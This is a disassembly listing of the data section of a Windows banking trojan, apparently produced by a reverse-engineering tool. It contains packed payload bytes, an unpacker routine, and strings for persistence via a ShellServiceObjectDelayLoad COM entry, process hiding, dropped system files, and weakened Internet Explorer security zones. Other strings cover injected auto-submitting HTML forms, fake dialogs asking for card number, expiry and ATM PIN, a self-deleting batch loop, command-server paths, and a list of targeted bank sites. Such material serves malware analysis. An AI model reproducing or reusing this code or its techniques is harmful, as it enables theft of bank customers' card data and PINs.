0CEFFB894h, 687447EEh dd 6CA30458h, 0B8D6FF0Eh, 0F3C88648h, 4C50157Ch, 0F41CEA48h dd 6A53C1D0h, 0ECF329CCh, 3D736F4Dh, 96595183h, 34402FF3h dd 51F1F068h, 0AC4F076h, 0A012F098h, 53140D0Fh, 0D97A32D4h dd 12D84A06h, 301330CCh, 1D65E533h, 30E0C303h, 2A345644h dd 0B4C9A030h, 64FD2B02h, 1C81F50h, 53D3654Bh, 4C6E6970h dd 51ADEA0Ch, 1211774h, 0AEFEFB49h, 7953FEDDh, 1C6F626Dh dd 171A4C63h, 74520394h, 8975516Ch, 0DB6B36Ah, 61074979h dd 0ED925508h, 431B3173h, 0B677A895h, 565C642Bh, 6DAD542Bh dd 2D496450h, 0AA6B2916h, 669566FEh, 706D6F43h, 7164656Ch dd 1B92DB3Eh, 0F7F395h, 0C6C06342h, 5A4A68A0h, 0F6B517FAh dd 6E49F24Dh, 3C455D37h, 0FAA1257Eh, 2D75E85h, 6B957350h dd 27B3B09Fh, 6F5422BDh, 8D1B6E41h, 0E65176Bh, 644DEA33h dd 0B6C7BFF2h, 4D024E7Eh, 4CEC4D6Dh, 6761506Bh, 0A802BAD7h dd 4FE07B9Ah, 661E6662h, 585E7E03h, 17D44DB3h, 421452B5h dd 0CEDAA179h, 14541AAh, 0C355EE78h, 5417D9F6h, 0F9137079h dd 0FF955369h, 1A05186Dh, 726B736Fh, 652E6C6Eh, 0D6E12E78h dd 664BB536h, 7361384Bh, 73364F82h, 4113EFC9h, 69757163h dd 77085072h, 0DEDB42EDh, 71724973h, 3E0D48ADh, 0BB336961h dd 0D7B70B6h, 0A37044D4h, 41175D65h, 7C08B14Ch, 0C1749551h dd 6764B5DBh, 1176AD55h, 0A95B22DCh, 5074E2DAh, 0CC27158Bh dd 0FEA870DDh, 667542BDh, 81C819D4h, 332CE425h, 0E496029h dd 45725F4Bh, 6DEA8D0Ch, 63724100h, 0F685C5BDh, 0BAA3D6DAh dd 0EF33226Eh, 0BC2AAB36h, 0AE69B7h, 0A033011Fh, 0CF6C3DE4h dd 4136E55Ah, 256F4274h, 2D92B726h, 2B959980h, 8DDD662Bh dd 70566548h, 156D3C79h, 15876422h, 0F9751D14h, 891F491Ah dd 59532E0Dh, 4AC8A153h, 8901D5F1h, 2D17B618h, 1E69007h dd 48041930h, 14B2C95Bh, 1304C04Fh, 53C0D743h, 5F9D56B4h dd 0CDED4505h, 5340D034h, 5FB34FABh, 0FE788B05h, 4F0B46B9h dd 0FEEF04BDh, 26C36D03h, 75D452Bh, 0B4EF473Fh, 19017210h dd 1D733163h, 744F6C34h, 6735697Bh, 839B074Dh, 0D6C61AEh dd 2B660D49h, 0B1BC4023h, 34B93BAEh, 62073903h, 75D064C7h dd 171E751Dh, 736D2343h, 0C80D14B0h, 61812073h, 7418C188h dd 20AF6B61h, 0F74D339Bh, 6307D13Dh, 79206F11h, 0E0C43D92h dd 1407CF76h, 0DC0CC153h, 79533DF6h, 375DF34Fh, 54CF9DD6h dd 6E2D4B33h, 520D6C05h, 7BAE066h, 137531C3h, 0E61D8DCFh dd 4715119Eh, 631544CBh, 8DD74494h, 69797069h, 5B1F6E2Dh dd 49B6F759h, 65215168h, 89055399h, 36B901h, 5881560Bh dd 4B971C2Bh, 585EF32h, 0C8D8F307h, 2E373135h, 0C44F0700h dd 74B06665h, 6ED561B7h, 90B6EBAFh, 2F2971E7h, 29671B4Ch dd 0EEB1B84h, 8D79930Dh, 1021A367h, 13D9ECAEh, 0EB061B20h dd 15A9BA1Ah, 530BF32h, 6233092Dh, 9B8ACEC2h, 3054770Ch dd 6DC62F0Dh, 72C75164h, 0B38F7426h, 7D29576Fh, 8D830B6Bh dd 1FD5CC34h, 69934F3Eh, 66126C09h, 0EF6E2FE7h, 0BAC1A461h dd 5779072Eh, 75500D20h, 6C6E7C7h, 0B9425761h, 0C46F643Fh dd 5C48BEE8h, 750F6F1Fh, 8CA2EF43h, 3A774525h, 212308BBh dd 0DFE15B64h, 46CEE7DEh, 5F7553B7h, 61D2F569h, 44B7C26Ch dd 5D43561Fh, 56E88709h, 6D842400h, 0B6E8C27Ah, 611F7315h dd 0B00409A3h, 0CD90337Fh, 80A80315h, 0D034C433h, 0D55BDF34h dd 0EE34FFFFh, 1B350F34h, 39352A35h, 0D135A635h, 0E035D735h dd 6FFA32A7h, 6B36FF55h, 9B368A36h, 1099A436h, 1C378A37h dd 0FF384638h, 3A17FFFFh, 38C3385Fh, 38FE38E2h, 39383928h dd 394B3945h, 39B63965h, 39E639D3h, 0FFFF39F9h, 3A39FFFFh dd 3A473A40h, 3A553A4Eh, 3A633A5Ch, 3A713A6Ah, 3A903A78h dd 3AA83A9Fh, 3AF43AB1h, 0FFFF3B08h, 3B10FFFFh, 3B763B15h dd 3C0C3B7Eh, 3C8C3C72h dd 3D093C9Fh, 3DB03D31h, 3E3A3DB9h, 3E973E80h, 0AF8B3E9Eh dd 3EBEFFFFh, 3F353F04h, 3F623F4Ch, 3F7D3F6Eh, 84F93FF0h dd 0FFF27B10h, 20C066FFh, 11310530h, 39312A31h, 78316C31h dd 98318931h, 2320C31h, 23FFFFC0h, 44332B33h, 0E333C233h dd 13340B33h, 29341834h, 0FFDDFF8Fh, 0C13458FFh, 0FB34F334h dd 29352134h, 81352E35h, 0E5CB8935h, 0FD35F335h, 23361635h dd 0FFF77F46h, 39363036h, 58364136h, 82367C36h, 0DD36BADBh dd 53384E36h, 0FFFFFF0Eh, 387D38FFh, 38B13890h, 39B1393Eh dd 3A223A17h, 3A683A5Eh, 3AE83AC6h, 3B283B1Dh, 3B853B7Ch dd 0FFFBBFB7h, 3C073BFEh, 3C703C68h, 3C803C76h, 3CE7B988h dd 3D5D3D50h, 453E2E34h, 0FFFFFFFEh, 503E4A3Eh, 6E3E573Eh dd 0CD3E783Eh, 613EDE3Eh, 853F6C3Fh, 0BF3F933Fh, 0DB3FCA3Fh dd 0FF3FE93Fh, 0E81EEFFFh, 304CBFF4h, 30D93089h, 30F630DEh dd 313A30FDh, 315B3141h, 2F103164h, 3194FFF4h, 31A8319Fh dd 31F231ADh, 353F31F8h, 0FE1B1632h, 0C39E1ADFh, 34BA34AAh dd 34D734CBh, 8D203508h, 3780356Eh, 3586FE00h, 35A535A0h dd 37482778h, 0EDF00076h, 380E0F0Dh, 5038A72Ch, 0B7FF6838h dd 0CB51BFFFh, 19391438h, 26392039h, 34392C39h, 39610039h dd 39853976h, 399F398Dh, 0EE0B001Bh, 0CBAC39A7h, 0ED17D099h dd 0FD5BFE00h, 0FA39F539h, 3A4BFF39h, 3A183A10h, 0FF743A1Eh dd 1937FFFFh, 3B423AB3h, 3B813B73h, 3BAE3BA8h, 3BBA3BB4h dd 3BC63BC0h, 3BD23BCCh, 2FFF3BD8h, 3BDEFFFDh, 3BEA3BE4h dd 3DA23BF0h, 3DF33DEEh, 143E0FA0h, 303E213Eh, 423E353Eh dd 0FFFFC006h, 563E513Eh, 723E603Eh, 893E813Eh, 3D3E903Eh dd 0C02B473Fh, 83F001BFh, 0A629913Fh, 0C43FBC3Fh, 19FFD53Fh dd 0F32D06DBh, 15DF30F3h, 1F301A30h, 0F8242430h, 2930EDB7h dd 0F5350030h, 65303F30h, 1F306A30h, 9EC7E6h, 4931424Eh dd 40601997h, 1A2FA06h, 4473458Dh, 49FE73F8h, 706802ECh dd 3220FB6Bh, 4B5C302Eh, 809E268Bh, 5C775C17h, 120F4F0h dd 64705505h, 95C4B162h, 0AA4EA704h, 0D43BFE77h, 42095A6Ah dd 6174536Bh, 5307472h, 72476F9Ch, 0D670756Fh, 0A41780Ah dd 82C11FACh, 0D7347405h, 50167618h, 0D55C7643h, 205B6E73h dd 0D7000D01h, 1ED709Fh, 6F977EDEh, 1D00BA1Dh, 903E08F6h dd 575D155Ch, 4640323Ch, 0FB590660h, 2A1F4523h, 0F6338008h dd 177EFF85h, 15197F18h, 1E285C66h, 7CF73B46h, 0F30AA423h dd 3B2480E9h, 4362FEE0h, 40101CF2h, 0C131800h, 61765468h dd 73C6C9BEh, 0E6A1114h, 813E4810h, 1028E054h, 0C2A90040h dd 1448EE74h, 0E7E04C1Bh, 5660A306h, 90F54C6h, 5AF736A3h dd 20054910h, 9C4F4004h, 67FB6405h, 20345931h, 4C9C64BDh dd 0BE57F6C9h, 0C6A49C9Ch, 0A481CF25h, 0F7D068C0h, 0D8799Fh dd 683A6816h, 0BE0A6ABBh, 0F3482394h, 8D597FDDh, 0A5F3AC7Dh dd 0B84BEA4h, 0A5D87D8Dh, 0B19E7CA5h, 0F5F0C11Bh, 0E80A74BEh dd 76EBB76Ch, 0E4A5F847h, 0A40B6468h, 99BEACE6h, 553E205Dh dd 0C1692480h, 0B0016A7Bh, 14EC7457h, 35196A0Fh, 9E2350Fh dd 831FF89Bh, 61C94CC4h, 0E19CCD92h, 6AF8DF08h, 6CD437F5h dd 400544A6h, 0F80D4A9h, 0F7617385h, 0EFBCBE9Dh, 96F26604h dd 0F7BAFF00h, 0C64420Eh, 14EC358Bh, 6767F4FEh, 1AD64630h dd 47831903h, 0C2EEBF78h, 3C305204h, 1105842Ah, 6159010Eh dd 1E67D98Bh, 39EC6859h, 1342A20h, 0F3C868h, 0AD7210FFh dd 13DE1A7Ch, 0EA60385Ah, 74C3640Ah, 76E0349Fh, 30AFD404h dd 0EFEF112Eh, 8D047B2Ch, 0FF68D68Dh, 562898D0h, 1DEFBF0Ah dd 6C51204Dh, 0B55FBBh, 0C0968B59h, 962A3635h, 144876A7h dd 570950DDh, 2D1E04B6h, 27D8DEAh, 80EFF33h, 0B45420F9h dd 575DB023h, 57B01D24h, 2057359h, 0CC51h, 0A0286016h dd 41101B70h, 3C61019Ch, 0C4061801h, 44015C21h, 80C03100h dd 0BA0ABA42h, 773E9384h, 310400F9h, 0A6922030h, 57908824h dd 88040155h, 10B2031h, 2090E292h, 1D4010Eh, 0B2C40656h dd 20904C04h, 6D3EE606h, 1212F125h, 41168844h, 0D25CD830h dd 0B27B7DE3h, 4456460Ah, 5580B667h, 8A368510h, 69C443ECh dd 7301315Ch, 165F2006h, 10C54h, 0E12F20F2h, 6E010F79h dd 0B078D565h, 80C122A0h, 5810CE2h, 21F8DF5h, 0E054840Ch dd 837A744Eh, 41957ACh, 96046817h, 0B05F5059h, 2EB906Ch dd 206C510Ch, 7B2CFD48h, 0BC000000h, 71BFh, 1200h, 0BE6000FFh dd 406000h, 0B000BE8Dh, 8357FFFFh, 10EBFFCDh, 90909090h dd 68A9090h, 47078846h, 775DB01h, 0EE831E8Bh, 72DB11FCh dd 1B8EDh, 0DB010000h, 1E8B0775h, 11FCEE83h, 1C011DBh dd 75EF73DBh, 831E8B09h, 0DB11FCEEh, 0C931E473h, 7203E883h dd 8E0C10Dh, 8346068Ah, 7474FFF0h, 0DB01C589h, 1E8B0775h dd 11FCEE83h, 1C911DBh, 8B0775DBh, 0FCEE831Eh, 0C911DB11h dd 1412075h, 8B0775DBh, 0FCEE831Eh, 0C911DB11h, 0EF73DB01h dd 1E8B0975h, 11FCEE83h, 83E473DBh, 0FD8102C1h, 0FFFFF300h dd 8D01D183h, 0FD832F14h, 8A0F76FCh, 7884202h, 0F7754947h dd 0FFFF63E9h, 28B90FFh, 8904C283h, 4C78307h, 7704E983h dd 0E9CF01F1h, 0FFFFFF4Ch, 0B9F7895Eh, 11Ah, 2C47078Ah dd 77013CE8h, 43F80F7h, 78BF275h, 66045F8Ah, 0C108E8C1h dd 0C48610C0h, 0EB80F829h, 89F001E8h, 5C78307h, 0D9E2D889h dd 7000BE8Dh, 78B0000h, 3C74C009h, 8D045F8Bh, 90003084h dd 0F3010000h, 8C78350h, 905096FFh, 8A950000h, 0C0084707h dd 0F989DC74h, 0AEF24857h, 5496FF55h, 9000090h, 890774C0h dd 4C38303h, 96FFE1EBh, 9058h, 0DF61E961h, 0FFFFh, 25h dup(0) dd 0A0700000h, 0A0500000h, 3 dup(0) dd 0A07D0000h, 0A0600000h, 3 dup(0) dd 0A08A0000h, 0A0680000h, 5 dup(0) dd 0A0940000h, 0A0A20000h, 0A0B20000h, 0 dd 0A0C00000h, 0 dd 0A0CE0000h, 0 dd 454B0000h, 4C454E52h, 442E3233h, 41004C4Ch, 50415644h dd 2E323349h, 6C6C64h, 4356534Dh, 642E5452h, 6C6Ch, 64616F4Ch dd 7262694Ch, 41797261h, 65470000h, 6F725074h, 64644163h dd 73736572h, 78450000h, 72507469h, 7365636Fh, 73h, 43676552h dd 65736F6Ch, 79654Bh, 61720000h, 646Eh, 4Ah dup(0) db 3 dup(0) aCBoot_sys db 'c:\boot.sys',0 ; DATA XREF: sub_40523F:loc_405261o align 4 dword_424038 dd 11h, 0Fh dup(0)dword_424078 dd 0E1F7EEA5h, 0BFFD7E2Ch, 869AE87Fh, 0CC244082h, 0D76ADDE2h ; DATA XREF: sub_405336:loc_405339o dd 1B77E1E1h, 505215B0h, 0D24B6456h, 3D357C6Bh, 280E85D5h dd 1AB051F9h, 1E4E8744h, 0E383CCDFh, 323D4737h, 14F80518h dd 6E0637BFh dword_4240B8 dd 0FFFFFFFFh dd 2Ah dup(0FFFFFFFFh), 3Eh, 3 dup(0FFFFFFFFh), 3Fh, 34h dd 35h, 36h, 37h, 38h, 39h, 3Ah, 3Bh, 3Ch, 3Dh, 7 dup(0FFFFFFFFh) dd 0 dd 1, 2, 3, 4, 5, 6, 7, 8, 9, 0Ah, 0Bh, 0Ch, 0Dh, 0Eh dd 0Fh, 10h, 11h, 12h, 13h, 14h, 15h, 16h, 17h, 18h, 19h dd 6 dup(0FFFFFFFFh), 1Ah, 1Bh, 1Ch, 1Dh, 1Eh, 1Fh, 20h dd 21h, 22h, 23h, 24h, 25h, 26h, 27h, 28h, 29h, 2Ah, 2Bh dd 2Ch, 2Dh, 2Eh, 2Fh, 30h, 31h, 32h, 33h, 85h dup(0FFFFFFFFh) off_4244B8 dd offset loc_405455 ; DATA XREF: sub_40540A+44r dd offset loc_40545A dd offset loc_40547A dd offset loc_40549D byte_4244C8 db 2 dup(0) ; DATA XREF: sub_4068A8+555o aUnableToAuth_0 db 'Unable to authorize',0 ; DATA XREF: sub_4068A8+423o aUnableToAuth_1 db 'Unable to authorize - INCORRECT PIN. Please, correct.',0 ; DATA XREF: sub_4068A8+428o aSS_1 db '%s-%s',0 ; DATA XREF: sub_4068A8+2E7o aPleaseSelect_0 db 'Please, select Expiration Year',0 ; DATA XREF: sub_4068A8+2BDo aSS_0 db '%s %s',0 ; DATA XREF: sub_4068A8+285o ; sub_4068A8+452o aPleaseSelectEx db 'Please, select Expiration Month',0 ; DATA XREF: sub_4068A8+25Bo aS_0 db '%s',0 ; DATA XREF: sub_4068A8+223o aV db 'V',0 ; DATA XREF: sub_406344+3DAo aK db 'K',0 ; DATA XREF: sub_406344+3C9o aRegisterservic db 'RegisterServiceProcess',0 ; DATA XREF: sub_406344+31Ao aKernel32_dll_1 db 'kernel32.dll',0 ; DATA XREF: sub_406344+310o aBoot_sys db '\boot.sys',0 ; DATA XREF: sub_406344+250o aDatkkq32_dll db 'datkkq32.dll',0 ; DATA XREF: sub_406344+228o aDnkkq_dll db 'dnkkq.dll',0 ; DATA XREF: sub_406344+20Fo aKkq32_dll db 'kkq32.dll',0 ; DATA XREF: sub_406344:loc_40653Ao aSS db '%s\%s',0 ; DATA XREF: sub_406344+200o ; sub_406344+219o ... aEnabledsf db 'enabledsf',0 ; DATA XREF: sub_406344:loc_4063A9o aDriversNdisrd_ db '\drivers\ndisrd.sys',0 ; DATA XREF: sub_406344+22o align 4 dd 2 dup(0) dbl_4245E4 dq 1.2 ; DATA XREF: sub_405AAC:loc_406238r aNewver db 'newver',0 ; DATA XREF: sub_405AAC+73Eo aXd2 db 'xd2',0 ; DATA XREF: sub_405AAC+70Ao aWupd db 'wupd ',0 ; DATA XREF: sub_405AAC+6A5o a02u db ':%02u',0 ; DATA XREF: sub_405AAC+599o a?dmp2 db '?dmp=2',0 ; DATA XREF: sub_405AAC+4F8o aSS_tmp db '%s\%s.tmp',0 ; DATA XREF: sub_405AAC+415o aWpst db 'wpst ',0 ; DATA XREF: sub_405AAC+28Eo aQ db 'q',0 ; DATA XREF: sub_405AAC+117o ; sub_405AAC+309o ... a?ifcU db '?ifc=%u',0 ; DATA XREF: sub_405AAC+E8o aIfc db 'ifc',0 ; DATA XREF: sub_405AAC+CEo ; sub_405AAC+163o aSoftwareMicr_3 db 'Software\Microsoft\Windows',0 ; DATA XREF: sub_405AAC+D3o ; sub_405AAC+168o aW_php db '/w.php',0 ; DATA XREF: sub_405AAC+94o asc_42464A db '/',0 ; DATA XREF: sub_405AAC+73o aHttpS db 'http://%s',0 ; DATA XREF: sub_405AAC+60o aSS_dat db '%s\%s.dat',0 ; DATA XREF: sub_405AAC+36o ; sub_405AAC+6DBo aClickOnceToCon db 'Click Once To Continue',0 ; DATA XREF: sub_40553F+412o aButton db 'BUTTON',0 ; DATA XREF: sub_40553F+417o aEdit db 'EDIT',0 ; DATA XREF: sub_40553F+396o ; sub_40553F+3CCo aPleaseMakeCorr db 'Please make corrections and try again.',0 ; DATA XREF: sub_40553F+328o aUnableToAuthor db 'Unable to authorize. ATM PIN-Code is required to complete the tra' ; DATA XREF: sub_40553F+2EFo db 'nsaction.',0 aAtmPinCode db 'ATM PIN-Code',0 ; DATA XREF: sub_40553F+2B6o aExpirationDate db 'Expiration date',0 ; DATA XREF: sub_40553F+27Do aYourCardNumber db 'Your card number',0 ; DATA XREF: sub_40553F+244o a20_2u db '20%.2u',0 ; DATA XREF: sub_40553F+1EAo a_2u db '%.2u',0 ; DATA XREF: sub_40553F+1B8o aCombobox db 'COMBOBOX',0 ; DATA XREF: sub_40553F+164o ; sub_40553F+19Ao aAuthorizationF db 0Ah ; DATA XREF: sub_40553F+AFo db ' Authorization Failed.',0 aStatic db 'STATIC',0 ; DATA XREF: sub_40553F+B4o ; sub_40553F+F8o ... aKkqhook db 'KKQHOOK',0 ; DATA XREF: sub_40553F+75o ; sub_405AAC+11Co ... align 2 aExplorer db 'Explorer',0 ; DATA XREF: sub_40553F+1Ao ; sub_4068A8+78o aDocobject db 'DocObject',0 ; DATA XREF: sub_40553F+Bo ; sub_4068A8+62o aCmd_exeCStartC db '\cmd.exe /C start c:\boot.sys',0 ; DATA XREF: sub_40523F:loc_4052D9o aKernel32_dll_0 db '\kernel32.dll',0 ; DATA XREF: sub_40519A+2Eo a_google_adware db '.google.adware',0 ; DATA XREF: sub_404BA0+1B3o a_google_ db '.google.',0 ; DATA XREF: sub_404BA0+198o asc_4247B9 db ':',0 ; DATA XREF: sub_404BA0+EDo asc_4247BB db ' %X:',0 ; DATA XREF: sub_404BA0+ABo asc_4247C0 db '|',0 ; DATA XREF: sub_40479E:loc_4047F2o aFrame_XForm_X db '<FRAME_%X-FORM_%X> ',0 ; DATA XREF: sub_404878-F8o aMainpgForm_X db '<MAINPG-FORM_%X> ',0 ; DATA XREF: sub_404878-12Do aName: ; DATA XREF: sub_4043B0+20o unicode 0, <name>,0 align 4 aValue: ; DATA XREF: sub_4043B0+10o unicode 0, <value>,0 aMicrosoftInter db 'Microsoft Internet Explorer',0 ; DATA XREF: sub_404211+6Ao a9ba05972F6a811: ; DATA XREF: sub_404184+1Eo unicode 0, <{9BA05972-F6A8-11CF-A442-00A0C90A8F39}>,0 aHtml_1 db '<HTML><!--',0 ; DATA XREF: sub_403D8E+2B2o ; sub_403D8E+2BDo ... aXOkrecv11 db 'X-okRecv11',0 ; DATA XREF: sub_403D8E+24Bo aIeframe db 'IEFrame',0 ; DATA XREF: sub_403D8E+1FAo aSUMicrosoftInt db '%s%u - Microsoft Internet Explorer',0 ; DATA XREF: sub_403D8E+1D6o aIexplore_exe_0 db '\Iexplore.exe ',0 ; DATA XREF: sub_403D8E:loc_403E8Eo aPath db 'Path',0 ; DATA XREF: sub_403D8E+56o aSoftwareMicr_2 db 'Software\Microsoft\IE Setup\Setup',0 ; DATA XREF: sub_403D8E+5Bo aAppeventsSch_0 db 'AppEvents\Schemes\Apps\Explorer\ActivatingDocument\.Current',0 ; DATA XREF: sub_403BC5+1B5o aAppeventsSchem db 'AppEvents\Schemes\Apps\Explorer\Navigating\.Current',0 ; DATA XREF: sub_403BC5+198o aGlobaluseroffl db 'GlobalUserOffline',0 ; DATA XREF: sub_403BC5+176o aSoftwareMicr_1 db 'Software\Microsoft\Windows\CurrentVersion\Internet Settings',0 ; DATA XREF: sub_403BC5+17Bo aIexplore_exe db 'iexplore.exe',0 ; DATA XREF: sub_403BC5+152o aSSoftwareMicro db '%s\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATU' ; DATA XREF: sub_403BC5+12Fo db 'RE_LOCALMACHINE_LOCKDOWN',0 aYes db 'yes',0 ; DATA XREF: sub_403BC5+FEo aBrowsenewproce db 'BrowseNewProcess',0 ; DATA XREF: sub_403BC5+103o a_defaultSoftwa db '.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Brows' ; DATA XREF: sub_403BC5+108o db 'eNewProcess',0 aSoftwarePolici db 'SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Setti' ; DATA XREF: sub_403BC5+83o db 'ngs\Zones\%u',0 a1601 db '1601',0 ; DATA XREF: sub_403BC5+44o ; sub_403BC5+65o ... aSoftwareMicr_0 db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones' ; DATA XREF: sub_403BC5+28o db '\%u',0 aHtml_0 db '</html>',0 ; DATA XREF: sub_403659+4E8o aBody_0 db '</body>',0 ; DATA XREF: sub_403659+4DDo aScript_0 db '</script>',0 ; DATA XREF: sub_403659+4D2o aSettimeoutSU db 'setTimeout("%s()",%u);',0 ; DATA XREF: sub_403659+4B4o asc_424B31 db '}',0 ; DATA XREF: sub_403659+48Co aDocument_S_sub db 'document.%s.submit();',0 ; DATA XREF: sub_403659+46Eo aFunctionS db 'function %s(){',0 ; DATA XREF: sub_403659+449o aC_2u db '%c%.2u',0 ; DATA XREF: sub_403659+431o aScript db '<script>',0 ; DATA XREF: sub_403659+3F7o aForm db '</form>',0 ; DATA XREF: sub_403659+3ECo aInputTypeSubmi db '<input type="submit" value=',27h,27h,'>',0 ; DATA XREF: sub_403659:loc_403A3Ao aS db '%s|',0 ; DATA XREF: sub_403659+31Co aInputTypeEdi_0 db '<input type="edit" value=',27h,'%s',27h,' name=',27h,'%s%u',27h,'><br>',0Dh,0Ah,0 ; DATA XREF: sub_403659+290o ; sub_403659+388o aInputTypeEditV db '<input type="edit" value=',27h,'%u',27h,' name=',27h,'a',27h,'><br>',0Dh,0Ah,0 ; DATA XREF: sub_403659+1ADo aFormActionSMet db '<form action="%s" method="POST" name="%s">',0 ; DATA XREF: sub_403659+176o aF_3u db 'f%.3u',0 ; DATA XREF: sub_403659+158o aBody db '<body>',0 ; DATA XREF: sub_403659+13Co aHead_0 db '</head>',0 ; DATA XREF: sub_403659+12Eo aMicrosoftCorp db 'MicroSoft-Corp',0 ; DATA XREF: sub_403659+105o ; sub_403D8E+1D1o aTitleSUTitle db '<title>%s%u</title>',0 ; DATA XREF: sub_403659+10Ao aHead db '<head>',0 ; DATA XREF: sub_403659+F4o aHtml db '<html>',0 ; DATA XREF: sub_403659+E6o a_htm db '.htm',0 ; DATA XREF: sub_403659+D6o aSCC db '%s%c%c',0 ; DATA XREF: sub_4035B2+84o ; sub_403659+25Ao a_ db '*.*',0 ; DATA XREF: sub_4034AD+76o a? db '?',0 ; DATA XREF: sub_4034AD+24o aLu db '-%lu',0 ; DATA XREF: sub_4032E2+E5o aLu_0 db '%lu',0 ; DATA XREF: sub_4032E2+C0o a0x02hx02hx02hx db '0x%02hx%02hx%02hx%02hx%02hx%02hx',0 ; DATA XREF: sub_4032E2+88o aSLu db 'S-%lu-',0 ; DATA XREF: sub_4032E2+36o aCenter_0 db '</center>',0 ; DATA XREF: sub_403010+2A0o aCenter db '<center>',0 ; DATA XREF: sub_403010+280o aFont db '</font>',0 ; DATA XREF: sub_403010+260o aU db '</u>',0 ; DATA XREF: sub_403010+240o aB db '</b>',0 ; DATA XREF: sub_403010+220o aI db '</i>',0 ; DATA XREF: sub_403010+200o aI_0 db '<i>',0 ; DATA XREF: sub_403010+1E0o aU_0 db '<u>',0 ; DATA XREF: sub_403010+1C0o aB_1 db '<b>',0 ; DATA XREF: sub_403010+1A0o aBr db '<br>',0 ; DATA XREF: sub_403010+180o asc_424CE1 db '--> ',0 ; DATA XREF: sub_403010+52o asc_424CE6 db '<!-- ',0 ; DATA XREF: sub_402F2F+37o asc_424CEC db 0Dh,0Ah,0 ; DATA XREF: sub_402D21+1FCo ; sub_403010+2C0o ... aCCC db '//%c%c%c',0Dh,0Ah,0 ; DATA XREF: sub_402D21+1C9o aVarCCCU db 'var %c%c%c = %u;',0 ; DATA XREF: sub_402D21+141o asc_424D0B db ' */',0 ; DATA XREF: sub_402D21+ACo aSC db '%s%c',0 ; DATA XREF: sub_402D21+7Ao ; sub_403010-64o ... asc_424D14 db '/* ',0 ; DATA XREF: sub_402D21+37o aBlind_user db 'blind_user',0 ; DATA XREF: sub_402CB2+39o ; sub_402D13+4o aSCS db '%s /C %s',0 ; DATA XREF: sub_402B0D+17Eo ; sub_405AAC+681o aLoop@delSNul@i db ':loop',0Dh,0Ah ; DATA XREF: sub_402B0D+12Fo db '@del %s>nul',0Dh,0Ah db '@if exist %s goto loop',0Dh,0Ah db '@del %s>nul',0Dh,0Ah,0 aCommand_com db '\command.com',0 ; DATA XREF: sub_402B0D+DAo ; sub_405AAC+650o aSCommand_pif db '%s\command.pif',0 ; DATA XREF: sub_402B0D+C9o ; sub_405AAC+63Fo aSXslfdl9x_bat db '%s\xslfdl9x.bat',0 ; DATA XREF: sub_402B0D+B1o aCmd_exe db '\cmd.exe',0 ; DATA XREF: sub_402B0D+83o ; sub_405AAC+611o aSCmd_pif db '%s\cmd.pif',0 ; DATA XREF: sub_402B0D+72o ; sub_40523F:loc_4052C8o ... aSXslfdlnt_bat db '%s\xslfdlnt.bat',0 ; DATA XREF: sub_402B0D+5Ao aSoftwareMicros db 'Software\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelay' ; DATA XREF: sub_40284A+24Ao ; sub_406344+3BAo db 'Load',0 aApartment db 'Apartment',0 ; DATA XREF: sub_40284A+221o aThreadingmodel db 'ThreadingModel',0 ; DATA XREF: sub_40284A+226o byte_424E15 db 0 ; DATA XREF: sub_40284A+20Bo ; sub_403BC5+18Eo ... aClsidSInprocse db 'CLSID\%s\InProcServer32',0 ; DATA XREF: sub_40284A+1F3o ; sub_406344+3F2o aSS_dll db '%s\%s.dll',0 ; DATA XREF: sub_40284A+185o a04x04x04x04x04 db '{%04X%04X-%04X-%04X-%04X-%04X%04X%04X}',0 ; DATA XREF: sub_40284A+DEo asc_424E5F db ' ',0 ; DATA XREF: sub_402784+8Eo ; sub_404BA0+146o aSS_exe db '%s\%s.exe',0 ; DATA XREF: sub_402784+22o ; sub_406344+187o a08x db '%08X',0 ; DATA XREF: sub_4026EE+62o aP0: ; DATA XREF: sub_402638+18o ; .text:0040269Ao ... unicode 0, <#P0> aF db ':F',0 ; DATA XREF: sub_4024E0+18o ; sub_40251A+19o aChevychasebank db 'chevychasebank.com',0 ; DATA XREF: .data:0041A1C4o aGronxplanets_r db 'gronxplanets.ru',0 ; DATA XREF: .data:0041A1C0o aWww_mdmbank_ru db 'www.mdmbank.ru',0 ; DATA XREF: .data:0041A1BCo aFethard_biz db 'fethard.biz',0 ; DATA XREF: .data:0041A1B8o aRoyalbank_com db 'royalbank.com',0 ; DATA XREF: .data:0041A1B4o aSecuritylab_ru db 'securitylab.ru',0 ; DATA XREF: .data:0041A1B0o aTatNeftbank_ru db 'tat-neftbank.ru',0 ; DATA XREF: .data:0041A1ACo aSeclab_ru db 'seclab.ru',0 ; DATA XREF: .data:0041A1A8o aOpenbank_com db 'openbank.com',0 ; DATA XREF: .data:0041A1A4o aGutabank_ru db 'gutabank.ru',0 ; DATA XREF: .data:0041A1A0o aWww_b2bTrust_c db 'www.b2b-trust.com',0 ; DATA XREF: .data:0041A19Co aGrepwareFacili db 'grepware-facility.ru',0 ; DATA XREF: .data:0041A198o aWww_uralsib_ru db 'www.uralsib.ru',0 ; DATA XREF: .data:0041A194o a53bank_com db '53bank.com',0 ; DATA XREF: .data:0041A190o aWww_nbc_caInde db 'www.nbc.ca/index.php',0 ; DATA XREF: .data:0041A18Co aTotallyfreeban db 'totallyfreebanking.com',0 ; DATA XREF: .data:0041A188o aBarclays_com db 'barclays.com',0 ; DATA XREF: .data:0041A184o aWww_lbcdirect_ db 'www.lbcdirect.laurentianbank.ca/index.php',0 ; DATA XREF: .data:0041A180o aKidosBank_ru db 'kidos-bank.ru',0 ; DATA XREF: .data:0041A17Co aYambo_biz db 'yambo.biz',0 ; DATA XREF: .data:0041A178o aProrat_net db 'prorat.net',0 ; DATA XREF: .data:0041A174o aWww1_hsbc_caIn db 'www1.hsbc.ca/index.php',0 ; DATA XREF: .data:0041A170o aWww_ovk_ru db 'www.ovk.ru',0 ; DATA XREF: .data:0041A16Co aWww_rbc_com db 'www.rbc.com',0 ; DATA XREF: .data:0041A168o aMasterX_comFor db 'master-x.com/forum/',0 ; DATA XREF: .data:0041A164o aWww_allahabadb db 'www.allahabadbank.com',0 ; DATA XREF: .data:0041A160o aOnlineBusiness db 'online-business.lloydstsb.co.uk',0 ; DATA XREF: .data:0041A15Co aMyonlineaccoun db 'myonlineaccounts2.abbeynational.co.uk',0 ; DATA XREF: .data:0041A158o aWww_absolutban db 'www.absolutbank.ru',0 ; DATA XREF: .data:0041A154o aWww_nomos_ru db 'www.nomos.ru',0 